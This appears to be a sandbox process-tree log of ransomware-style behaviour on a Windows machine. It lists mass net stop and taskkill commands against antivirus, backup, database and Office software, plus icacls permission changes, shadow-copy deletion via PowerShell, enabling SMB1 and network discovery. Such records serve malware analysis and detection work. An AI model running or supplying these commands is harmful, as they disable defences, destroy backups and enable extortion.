
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
2⤵
PID:4244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:4784

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
PID:4296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:4848

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
PID:4200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:4796

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
2⤵
PID:4356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
3⤵
PID:4932

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
2⤵
PID:4400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
3⤵
PID:4980

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
2⤵
PID:4648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
3⤵
PID:4556

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
2⤵
PID:4708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
3⤵
PID:4352

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
2⤵
PID:4896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
3⤵
PID:7912

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
2⤵
PID:4952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
3⤵
PID:7920

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
2⤵
PID:5076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
3⤵
PID:10540

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:4416

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
2⤵
PID:2308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
3⤵
PID:11176

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
2⤵
PID:960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
3⤵
PID:11072

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
2⤵
PID:2712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:5100

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
2⤵
PID:708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
3⤵
PID:4300

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
2⤵
PID:2852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
3⤵
PID:10808

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
2⤵
PID:4940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:10776

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
2⤵
PID:4168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
3⤵
PID:12248

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
2⤵
PID:3364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
3⤵
PID:12224

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
2⤵
PID:928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:11008

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:3180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:11152

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
2⤵
PID:5828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
3⤵
PID:14196

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:10460

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:10892

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:10452

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:10444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:10412

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10404

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10396

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10388

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10380

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10372

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10364

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10356

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10348

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10340

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10328

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10316

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10304

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10292

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10280

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10268

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10256

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10244

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7932

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6984

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7672

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8164

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8252

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7784

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7760

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:8020

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7276

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7212

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7092

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7044

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6976

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7688

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10236

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10216

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10200

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10184

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
2⤵
PID:15684

C:\Windows\SysWOW64\net.exe
net view
3⤵
- Discovers systems in the same network
PID:15948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:15676

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:16032

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39
2⤵
PID:16200

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10168

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10144

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10132

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10116

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10096

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10084

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10072

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10048

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10024

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:9968

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:9960

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:9952

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
2⤵
PID:9944

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:9884

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:9656

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
2⤵
PID:9644

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
2⤵
PID:9636

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
2⤵
PID:9624

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
2⤵
PID:9616

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
2⤵
PID:8852

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
2⤵
PID:8748

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
2⤵
PID:8736

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
2⤵
PID:8652

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
2⤵
PID:6812

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
2⤵
PID:6800

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:6792

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
2⤵
PID:6780

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
2⤵
PID:6772

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
2⤵
PID:6764

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:6756

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
2⤵
PID:6748

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
2⤵
PID:6736

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:6728

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:6716

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
2⤵
PID:6708

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:6700

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
2⤵
PID:6692

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
2⤵
PID:6684

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
2⤵
PID:6672

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
2⤵
PID:6664

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
2⤵
PID:6652

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:6644

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
2⤵
PID:6636

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
2⤵
PID:6628

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
2⤵
PID:6620

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:6608

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
2⤵
PID:6600

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
2⤵
PID:6588

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
2⤵
PID:6580

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
2⤵
PID:6572

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
2⤵
PID:6564

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
2⤵
PID:6556

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
2⤵
PID:6544

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
2⤵
PID:6536

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:6520

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
2⤵
PID:6512

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
2⤵
PID:6504

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
2⤵
PID:6488

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
2⤵
PID:6480

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
2⤵
PID:6472

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
2⤵
PID:6464

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
2⤵
PID:6456

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
2⤵
PID:6448

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
2⤵
PID:6436

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
2⤵
PID:6428

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
2⤵
PID:6420

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
2⤵
PID:6412

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
2⤵
PID:6400

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
2⤵
PID:6392

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
2⤵
PID:6380

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
2⤵
PID:6372

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
2⤵
PID:6364

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
2⤵
PID:6356

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
2⤵
PID:6348

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
2⤵
PID:6336

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
2⤵
PID:6328

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
2⤵
PID:6316

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
2⤵
PID:6308

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:6300

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
2⤵
PID:6292

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
2⤵
PID:6284

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
2⤵
PID:6276

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
2⤵
PID:6268

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
2⤵
PID:6256

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
2⤵
PID:6248

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
2⤵
PID:6240

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
2⤵
PID:6228

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
2⤵
PID:6220

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
2⤵
PID:6212

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
2⤵
PID:6204

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
2⤵
PID:6196

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
2⤵
PID:6188

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
2⤵
PID:6176

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
2⤵
PID:6168

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
2⤵
PID:6156

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
2⤵
PID:6148

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
2⤵
PID:5168

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
2⤵
PID:4344

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
2⤵
PID:6136

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
2⤵
PID:6128

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
2⤵
PID:6116

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
2⤵
PID:6108

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:6100

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:6092

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:6084

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:6072

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:6064

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
2⤵
PID:6052

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:6044

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
2⤵
PID:6036

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
2⤵
PID:6028

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
2⤵
PID:6016

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
2⤵
PID:6008

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
2⤵
PID:5996

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
2⤵
PID:5988

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
2⤵
PID:5980

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
2⤵
PID:5972

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
2⤵
PID:5964

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
2⤵
PID:5952

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
2⤵
PID:5944

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
2⤵
PID:5932

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
2⤵
PID:5924

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
2⤵
PID:5916

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
2⤵
PID:5908

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:5900

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
2⤵
PID:5892

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
2⤵
PID:5884

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
2⤵
PID:5876

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
2⤵
PID:5864

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
2⤵
PID:5852

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
2⤵
PID:5844

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
2⤵
PID:5836

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
2⤵
PID:5820

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
2⤵
PID:5808

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
2⤵
PID:5800

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
2⤵
PID:5792

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
2⤵
PID:5784

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
2⤵
PID:5776

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
2⤵
PID:5768

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
2⤵
PID:5756

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
2⤵
PID:5748

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
2⤵
PID:5740

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
2⤵
PID:5732

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
2⤵
PID:5720

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
2⤵
PID:5712

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
2⤵
PID:5704

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
2⤵
PID:5696

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
2⤵
PID:5688

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
2⤵
PID:5680

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
2⤵
PID:5672

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
2⤵
PID:5660

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
2⤵
PID:5652

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
2⤵
PID:5640

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
2⤵
PID:5632

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
2⤵
PID:5624

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
2⤵
PID:5616

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
2⤵
PID:5608

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:5596

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
2⤵
PID:5588

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:5580

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:5572

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
2⤵
PID:5564

